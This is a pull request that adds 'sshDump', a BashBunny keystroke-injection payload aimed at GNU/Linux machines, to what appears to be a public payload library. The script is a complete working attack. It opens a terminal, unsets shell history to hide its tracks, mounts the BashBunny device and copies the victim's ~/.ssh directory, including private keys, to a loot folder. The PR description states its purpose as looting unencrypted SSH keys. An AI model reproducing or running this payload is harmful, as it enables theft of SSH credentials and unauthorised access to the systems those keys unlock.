### PR TITLE
created sshDump

### DIFF
--- a/payloads/library/credentials/sshDump/payload.txt
+++ b/payloads/library/credentials/sshDump/payload.txt
@@ -1,0 +1,49 @@
+# Title: sshDump
+# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Looting]
+Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
+Q ENTER
+Q DELAY 2000
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH


### PR DESCRIPTION
sshDump is BashBunny payload which takes advantage of unencrypted ssh private keys stored in home directory and loots them.